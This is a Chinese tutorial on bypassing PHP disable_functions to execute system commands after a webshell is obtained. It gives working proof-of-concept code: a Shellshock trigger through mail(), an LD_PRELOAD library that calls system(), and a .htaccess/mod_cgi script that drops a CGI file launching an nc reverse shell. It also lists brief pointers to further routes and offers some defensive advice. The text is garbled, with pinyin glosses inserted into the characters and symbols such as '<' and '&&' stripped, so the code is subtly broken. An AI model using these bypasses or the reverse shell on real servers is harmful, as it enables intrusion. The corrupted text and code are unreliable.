一、為什么要bypass disable functions

為了安全起見，很多運(yùn)維人員會(huì)禁用PHP的一些“危險(xiǎn)”函數(shù)，例如eval、exec、system等，將其寫在php.ini配置文件中，就是我們所說(shuō)的disable functions了，特別是虛擬主機(jī)運(yùn)營(yíng)商，為了徹底隔離同服務(wù)器的客戶，以及避免出現(xiàn)大面積的安全問(wèn)題，在disable functions的設(shè)置中也通常較為嚴(yán)格。

攻與防是對(duì)立的，也是互相補(bǔ)充的，既然有對(duì)函數(shù)的禁用措施，就會(huì)有人想方設(shè)法的去突破這層限制，我們只有在掌握突破方式以及原理的基礎(chǔ)之上，才能更好的去防范這類攻擊。

執(zhí)行系統(tǒng)命令通常是攻擊者拿到網(wǎng)站webshell之后想要進(jìn)一步動(dòng)作的必然操作，如若不能執(zhí)行系統(tǒng)命令，接下來(lái)的更深入的攻擊將很難繼續(xù)，所以就有了網(wǎng)站管理者禁用類似exec、system之類函數(shù)的現(xiàn)象。然而隨著技術(shù)的不斷進(jìn)步，不斷有新的思路出現(xiàn)，單純的禁用這些函數(shù)，某些情況下已經(jīng)不能阻止攻擊者達(dá)到執(zhí)行系統(tǒng)命令的目的了，那么攻擊者用什么樣的方式突破了disable functions呢？我們又怎樣防范這樣的攻擊呢？

二、 Bash漏洞導(dǎo)致的任意命令執(zhí)行

GNU Bash 環(huán)境變量遠(yuǎn)程命令執(zhí)行漏洞（CVE-2014-6271）是GNU Bash 的一個(gè)遠(yuǎn)程代碼執(zhí)行漏洞，在這個(gè)CVE的介紹中，可以看到這樣的描述：“GNU Bash 4.3及之前版本中存在安全漏洞，該漏洞源于程序沒(méi)有正確處理環(huán)境變量值內(nèi)的函數(shù)定義。遠(yuǎn)程攻擊者可借助特制的環(huán)境變量利用該漏洞執(zhí)行任意代碼。以下產(chǎn)品和模塊可能會(huì)被利用：OpenSSH sshd中的ForceCommand功能，Apache HTTP Server中的mod_cgi和mod_cgid模塊，DHCP客戶端等”。實(shí)際上，PHP也可以利用這個(gè)漏洞做很多事情，甚至有可能直接在80導(dǎo)致遠(yuǎn)程命令執(zhí)行。關(guān)于這個(gè)漏洞的詳細(xì)情況可以查閱CVE-2014-6271的相關(guān)資料，此處不再贅述。

下面我們來(lái)看一下PHP到底什么地方能用到bash的這個(gè)漏洞呢？其實(shí)可以用的地方不止一處，這里我們以mail函數(shù)作為例子，其他地方同理，可以自行分析。

PHP的mail函數(shù)提供了3個(gè)必選參數(shù)和2個(gè)可選參數(shù)，這里我們主要看最后一個(gè)參數(shù)，PHP官方手冊(cè)上對(duì)最后一個(gè)參數(shù)的說(shuō)明：

“Theadditional_parameters parameter can be used to pass an additional parameter tothe program configured to use when sending mail using the sendmail_pathconfiguration setting. For example, this can be used to set the envelope senderaddress when using sendmail with the -f sendmail option.
Theuser that the webserver runs as should be added as a trusted user to thesendmail configuration to prevent a ‘X-Warning' header from being added to themessage when the envelope sender (-f) is set using this method. For sendmailusers, this file is /etc/mail/trusted-users. “

簡(jiǎn)單的說(shuō)就是這個(gè)參數(shù)可以通過(guò)添加附加的命令作為發(fā)送郵件時(shí)候的配置，比如使用-f參數(shù)可以設(shè)置郵件發(fā)件人等，官方文檔在范例Example #3也有所演示，具體可以參考官方文檔： http://php.net/manual/zh/function.mail.php 。

在mail函數(shù)的源代碼mail.c中，我們可以找到如下代碼片段：

if (extra_cmd != NULL) {
       spprintf(sendmail_cmd, 0,"%s %s", sendmail_path, extra_cmd);
    } else {
       sendmail_cmd = sendmail_path;
    }

如果傳遞了第五個(gè)參數(shù)（extra_cmd），則用spprintf將sendmail_path和extra_cmd拼接到sendmail_cmd中（其中sendmail_path就是php.ini中的sendmail_path配置項(xiàng)），隨后將sendmail_cmd丟給popen執(zhí)行：

#ifdef PHP_WIN32
    sendmail = popen_ex(sendmail_cmd,"wb", NULL, NULL TSRMLS_CC);
#else
    /* Since popen() doesn't indicate if theinternal fork() doesn't work
    *(e.g. the shell can't be executed) we explicitly set it to 0 to be
    *sure we don't catch any older errno value. */
    errno = 0;
    sendmail = popen(sendmail_cmd,"w");
#endif

如果系統(tǒng)默認(rèn)sh是bash，popen會(huì)派生bash進(jìn)程，而我們剛才提到的CVE-2014-6271漏洞，直接就導(dǎo)致我們可以利用mail()函數(shù)執(zhí)行任意命令，繞過(guò)disable_functions的限制。但是這里其實(shí)有一個(gè)問(wèn)題，就是extra_cmd在spprintf之前做了安全檢查，我當(dāng)前的PHP版本是最新的7.2.4，代碼位置在mail.c的第371-375行：

 if (force_extra_parameters) {
       extra_cmd =php_escape_shell_cmd(force_extra_parameters);
    } else if (extra_cmd) {
       extra_cmd =php_escape_shell_cmd(ZSTR_VAL(extra_cmd));
    }

php_escape_shell_cmd函數(shù)會(huì)對(duì)特殊字符（包括#;`|*?~>^()[]{}$\, \x0A and \xFF. ‘ 等）進(jìn)行轉(zhuǎn)義，那這樣是不是就沒(méi)辦法了呢？不是的，我們可以通過(guò)putenv函數(shù)來(lái)設(shè)置一個(gè)包含自定義函數(shù)的環(huán)境變量，然后通過(guò)mail函數(shù)來(lái)觸發(fā)，網(wǎng)上早已有POC。

同樣調(diào)用popen派生進(jìn)程的php函數(shù)還有imap_mail，或者還可能有其他的我們沒(méi)有發(fā)現(xiàn)的函數(shù)，所以如果要防范這類攻擊，最好的辦法就是從根源上入手，修復(fù)CVE-2014-6271這個(gè)bash漏洞。

三、LD_PRELOAD：無(wú)需bash漏洞

上文說(shuō)到mail函數(shù)利用bash破殼漏洞可以實(shí)現(xiàn)突破disable functions的限制執(zhí)行系統(tǒng)命令，但是像這樣的漏洞，一般安全意識(shí)稍好一點(diǎn)的運(yùn)維人員，都會(huì)打上補(bǔ)丁了，那么是不是打上補(bǔ)丁之后就一定安全了呢？顯然答案是否定的，LD_PRELOAD是Linux系統(tǒng)的下一個(gè)有趣的環(huán)境變量：

“ 它允許你定義在程序運(yùn)行前優(yōu)先加載的動(dòng)態(tài)鏈接庫(kù)。這個(gè)功能主要就是用來(lái)有選擇性的載入不同動(dòng)態(tài)鏈接庫(kù)中的相同函數(shù)。通過(guò)這個(gè)環(huán)境變量，我們可以在主程序和其動(dòng)態(tài)鏈接庫(kù)的中間加載別的動(dòng)態(tài)鏈接庫(kù)，甚至覆蓋正常的函數(shù)庫(kù)。一方面，我們可以以此功能來(lái)使用自己的或是更好的函數(shù)（無(wú)需別人的源碼），而另一方面，我們也可以以向別人的程序注入程序，從而達(dá)到特定的目的。 ”

它允許你定義在程序運(yùn)行前優(yōu)先加載的動(dòng)態(tài)鏈接庫(kù)，我們只要知道這一件事就足夠了，這說(shuō)明什么？這說(shuō)明我們幾乎可以劫持PHP的大部分函數(shù)，還拿上文的mail函數(shù)作為例子，上文說(shuō)過(guò)，php的mail函數(shù)實(shí)際上是調(diào)用了系統(tǒng)的sendmail命令，那么我們來(lái)看一下sendmail都調(diào)用了哪些庫(kù)函數(shù)：

使用readelf -Ws /usr/sbin/sendmail命令來(lái)查看，我們發(fā)現(xiàn)sendmail函數(shù)在運(yùn)行過(guò)程動(dòng)態(tài)調(diào)用了很多標(biāo)準(zhǔn)庫(kù)函數(shù)，我們從中隨便選取一個(gè)庫(kù)函數(shù)geteuid進(jìn)行測(cè)試。

首先我們編寫一個(gè)自己的動(dòng)態(tài)鏈接程序，hack.c：

#includestdlib.h>
#include stdio.h>    
#includestring.h> 
void payload() {
    system("touch/var/www/html/test");
}  
int geteuid() {
if(getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
payload();
}

當(dāng)這個(gè)共享庫(kù)中的geteuid被調(diào)用時(shí)，嘗試加載payload()函數(shù)，執(zhí)行命令，在/var/www/html目錄下創(chuàng)建一個(gè)名字為test的文件。這里實(shí)際應(yīng)用時(shí)應(yīng)該注意編譯平臺(tái)和目標(biāo)盡量相近，以及注意路徑問(wèn)題，避免不必要的麻煩，這里我們僅僅作為測(cè)試，不考慮這些問(wèn)題。

[[email protected]]# gcc -c -fPIC hack.c -o hack
[[email protected]]# gcc -shared hack -o hack.so

我們把hack.so放到WEB目錄，然后編寫一個(gè)PHP文件進(jìn)行測(cè)試：

?php
putenv("LD_PRELOAD=/var/www/html/hack.so");
mail("[email protected]","","","","");
?>

我們的/var/www/html/目錄下本來(lái)只有hack.so和index.php這兩個(gè)文件，當(dāng)我們?cè)跒g覽器中訪問(wèn)index.php頁(yè)面之后，可以看到目錄下又多出了一個(gè)test文件，說(shuō)明我們的系統(tǒng)命令執(zhí)行成功。

（PS：筆者實(shí)際測(cè)試時(shí)的環(huán)境是VMPlayer7+CentOS7+Apache2.4+PHP7.2.4的環(huán)境，測(cè)試時(shí)遇到一個(gè)問(wèn)題，就是每次刷新訪問(wèn)index.php時(shí)，虛擬機(jī)的VM進(jìn)程會(huì)瘋狂的讀寫硬盤，幾乎獨(dú)占磁盤的所有活動(dòng)時(shí)間（機(jī)械硬盤），導(dǎo)致虛擬機(jī)卡頓到連鼠標(biāo)都無(wú)法移動(dòng)，物理機(jī)也因此受到影響明顯卡頓，約半小時(shí)左右這種情況會(huì)突然消失，最終測(cè)試結(jié)果成功。不知道是什么原因引起這種現(xiàn)象，需要進(jìn)一步研究，但不在本文討論范圍之內(nèi)。）

這種繞過(guò)行為實(shí)施起來(lái)很簡(jiǎn)單，并且目前為止還不受PHP與Linux版本的限制，但是也很容易防御，只要禁用相關(guān)的函數(shù)（putenv）或者限制對(duì)環(huán)境變量的傳遞就可以了，但是要注意對(duì)現(xiàn)有業(yè)務(wù)是否造成影響。

其實(shí)對(duì)于這個(gè)問(wèn)題，早在2008年就有人向PHP官方反饋過(guò)，只不過(guò)PHP給出的回復(fù)是你最好禁用putenv函數(shù)： https://bugs.php.net/bug.php?id=46741 ，所以我們有理由相信在后續(xù)的PHP版本中也不會(huì)對(duì)這個(gè)問(wèn)題有什么針對(duì)性的解決方案。

四、.htaccess：不止重定向

大家對(duì).htaccess文件一定不陌生，沒(méi)錯(cuò)，在apache的WEB環(huán)境中，我們經(jīng)常會(huì)使用.htaccess這個(gè)文件來(lái)確定某個(gè)目錄下的URL重寫規(guī)則，特別是一些開源的CMS或者框架當(dāng)中經(jīng)常會(huì)用到，比如著名的開源論壇discuz!，就可以通過(guò).htaccess文件實(shí)現(xiàn)URL的靜態(tài)化，大部分PHP框架，例如ThinkPHP和Laravel，在apache環(huán)境下會(huì)用.htaccess文件實(shí)現(xiàn)路由規(guī)則。但是如果.htaccess文件被攻擊者修改的話，攻擊者就可以利用apache的mod_cgi模塊，直接繞過(guò)PHP的任何限制，來(lái)執(zhí)行系統(tǒng)命令。

關(guān)于mode_cgi，可以參考apache的官方說(shuō)明：  http://man.chinaunix.net/newsoft/ApacheManual/mod/mod_cgi.html 。

“任何具有mime類型application/x-httpd-cgi或者被 cgi-script處理器(Apache 1.1或以后版本)處理的文件將被作為CGI腳本對(duì)待并由服務(wù)器運(yùn)行, 它的輸出將被返回給客戶端。通過(guò)兩種途徑使文件成為CGI腳本，或者文件具有已由 AddType指令定義的擴(kuò)展名，或者文件位于 ScriptAlias目錄中。”，這就表示，apache允許WEB服務(wù)器與可執(zhí)行文件進(jìn)行交互，這就意味著，你可以用C或者python編寫WEB應(yīng)用，聽起來(lái)我們好像可以做任何apache權(quán)限用戶能做的事情了，那么到底如何實(shí)現(xiàn)呢？

首先需要滿足幾個(gè)條件，第一，必須是apache環(huán)境，第二，mod_cgi已經(jīng)啟用（在我的環(huán)境下是默認(rèn)啟用的），第三，必須允許.htaccess文件，也就是說(shuō)在httpd.conf中，要注意AllowOverride選項(xiàng)為All，而不是none，第四，必須有權(quán)限寫.htaccess文件。其實(shí)這幾個(gè)條件還是比較容易滿足的，滿足了以上的條件，就可以“搞事情”了。

在apache的配置中，有一個(gè)非常重要的指令，Options，Options指令是Apache配置文件中一個(gè)比較常見也比較重要的指令，Options指令可以在Apache服務(wù)器核心配置(server config)、虛擬主機(jī)配置(virtual host)、特定目錄配置(directory)以及.htaccess文件中使用。Options指令的主要作用是控制特定目錄將啟用哪些服務(wù)器特性。關(guān)于Options指令后可以附加的特性選項(xiàng)的具體作用及含義，可以參考這篇文章： http://www.365mini.com/page/apache-options-directive.htm ，當(dāng)然我們用到的就是ExecCGI選項(xiàng)，表示允許使用mod_cgi模塊執(zhí)行CGI腳本。除了Options，我們還要配合另外一個(gè)AddHandler指令來(lái)使用，如果你對(duì)AddHandler不太熟悉沒(méi)關(guān)系，這么解釋一下就容易理解多了：AddType我們肯定很熟悉，比如配置apache對(duì)PHP的支持的時(shí)候，經(jīng)常會(huì)添加一行類似AddTypeapplication/x-httpd-php .php這樣的配置，這其實(shí)是指定了文件擴(kuò)展名和內(nèi)容類型之間的映射關(guān)系，而AddHandler則是指定擴(kuò)展名和處理程序之間的關(guān)系，也就是說(shuō)，可以指定某個(gè)特定的擴(kuò)展名的文件，如何來(lái)進(jìn)行處理。

有了Options和AddHandler，我們就可以隨便指定一個(gè)特定的文件擴(kuò)展名以特定的程序來(lái)處理，這樣思路就很清晰了：先把要執(zhí)行的程序?qū)懭胍粋€(gè)特定擴(kuò)展名的文件里，然后修改.htaccess文件，通過(guò)Options指令允許使用mod_cgi模塊執(zhí)行CGI腳本，然后再讓我們特定的擴(kuò)展名以cgi-script進(jìn)行處理，這樣我們甚至可以反彈一個(gè)shell出來(lái)。

POC如下，附注釋：

?php
$cmd = "nc -c'/bin/bash' 127.0.0.1 4444"; //反彈一個(gè)shell出來(lái)，這里用本地的4444端口
$shellfile ="#!/bin/bash\n"; //指定shell
$shellfile .="echo -ne \"Content-Type: text/html\\n\\n\"\n"; //需要指定這個(gè)header，否則會(huì)返回500
$shellfile .="$cmd"; 
functioncheckEnabled($text,$condition,$yes,$no) //this surely can be shorter
{
  echo "$text: " . ($condition ?$yes : $no) . "br>\n";
}
if(!isset($_GET['checked']))
{
  @file_put_contents('.htaccess',"\nSetEnv HTACCESS on", FILE_APPEND); 
  header('Location: ' . $_SERVER['PHP_SELF']. '?checked=true'); //執(zhí)行環(huán)境的檢查
}
else
{
  $modcgi = in_array('mod_cgi',apache_get_modules()); // 檢測(cè)mod_cgi是否開啟
  $writable = is_writable('.'); //檢測(cè)當(dāng)前目錄是否可寫
  $htaccess = !empty($_SERVER['HTACCESS']);//檢測(cè)是否啟用了.htaccess
    checkEnabled("Mod-Cgienabled",$modcgi,"Yes","No");
    checkEnabled("Iswritable",$writable,"Yes","No");
    checkEnabled("htaccessworking",$htaccess,"Yes","No");
  if(!($modcgi  $writable $htaccess))
  {
    echo "Error. All of the above mustbe true for the script to work!"; //必須滿足所有條件
  }
  else
  {
 checkEnabled("Backing 
up.htaccess",copy(".htaccess",".htaccess.bak"),"Suceeded!Saved in 
.htaccess.bak","Failed!"); //備份一下原有.htaccess
checkEnabled("Write 
.htaccessfile",file_put_contents('.htaccess',"Options 
+ExecCGI\nAddHandlercgi-script 
.dizzle"),"Succeeded!","Failed!");//.dizzle，我們的特定擴(kuò)展名
    checkEnabled("Write shellfile",file_put_contents('shell.dizzle',$shellfile),"Succeeded!","Failed!");//寫入文件
    checkEnabled("Chmod777",chmod("shell.dizzle",0777),"Succeeded!","Failed!");//給權(quán)限
    echo "Executing the script now.Check your listener img src = 'shell.dizzle' style ='display:none;'>"; //調(diào)用
  }
}
?>

我們?cè)诒镜亻_nc監(jiān)聽4444端口，然后在瀏覽器中打開這個(gè)頁(yè)面，如果執(zhí)行成功，將會(huì)反彈一個(gè)shell到4444端口：

當(dāng)訪問(wèn)POC的時(shí)候，成功反彈了一個(gè)shell到本地的4444端口，可以看到執(zhí)行id命令后的回顯。

五、其他方式

除上述方式外，在某些特定情況下，還有很多能夠繞過(guò)php.ini的禁用函數(shù)達(dá)到執(zhí)行系統(tǒng)命令目的的方法，但是由于這些方法受到的限制頗多，很少有滿足條件的真實(shí)環(huán)境，所以鑒于篇幅原因，以下只粗略介紹幾個(gè)其他繞過(guò)方式，并提供相關(guān)的詳細(xì)介紹的文章鏈接，如果有興趣詳細(xì)了解，可以參考互聯(lián)網(wǎng)上的相關(guān)資料。

ImageMagick

ImageMagick是一款使用量很廣的圖片處理程序，很多廠商包括Discuz、Drupal、Wordpress等常用CMS中也調(diào)用了ImageMagick擴(kuò)展或ImageMagick庫(kù)進(jìn)行圖片處理，包括圖片的伸縮、切割、水印、格式轉(zhuǎn)換等等。在ImageMagick6.9.3-9以前的所有版本中都存在一個(gè)漏洞，當(dāng)用戶傳入一個(gè)包含『畸形內(nèi)容』的圖片的時(shí)候，就有可能觸發(fā)命令注入，官方在6.9.3-9版本中對(duì)漏洞進(jìn)行了不完全的修復(fù)。關(guān)于這個(gè)漏洞的具體利用和防御方式可以參考：

 http://wooyun.jozxing.cc/static/drops/papers-15589.html 。

pcntl_exec

pcntl是linux下的一個(gè)擴(kuò)展，可以支持php的多線程操作。很多時(shí)候會(huì)碰到禁用exec函數(shù)的情況，但如果運(yùn)維人員安全意識(shí)不強(qiáng)或?qū)HP不甚了解，則很有可能忽略pcntl擴(kuò)展的相關(guān)函數(shù)。

COM 組件

Windows環(huán)境下，當(dāng)php.ini的設(shè)置項(xiàng)com.allow_dcom =true時(shí)，可以通過(guò)COM組件執(zhí)行系統(tǒng)命令，甚至開啟安全模式也可以，相關(guān)資料參考： https://www.exploit-db.com/exploits/4553/ 。

win32std

win32std是一個(gè)很老的PHP擴(kuò)展，其中的win_shell_execute函數(shù)可以用來(lái)執(zhí)行Windows系統(tǒng)命令： https://www.exploit-db.com/exploits/4218/ 。

六、總結(jié)

對(duì)于入侵者來(lái)說(shuō)，拿到一個(gè)webshell之后，如果想要進(jìn)一步獲取更高的權(quán)限或更多的數(shù)據(jù)和信息，執(zhí)行系統(tǒng)命令幾乎是必須的。當(dāng)我們?cè)赑HP應(yīng)用中出現(xiàn)了某些紕漏導(dǎo)致遭到入侵時(shí)，如何讓損失降到最低就成了首要的問(wèn)題。從本文已經(jīng)列舉的方法中不難看出只要掌握了這些原理，防范工作是非常簡(jiǎn)單有效的，只要經(jīng)常關(guān)注安全動(dòng)態(tài)，是完全可以做到對(duì)以上繞過(guò)措施進(jìn)行防御的。

以上所述是小編給大家介紹的PHP通過(guò)bypass disable functions執(zhí)行系統(tǒng)命令的方法匯總，希望對(duì)大家有所幫助，如果大家有任何疑問(wèn)請(qǐng)給我留言，小編會(huì)及時(shí)回復(fù)大家的。在此也非常感謝大家對(duì)腳本之家網(wǎng)站的支持！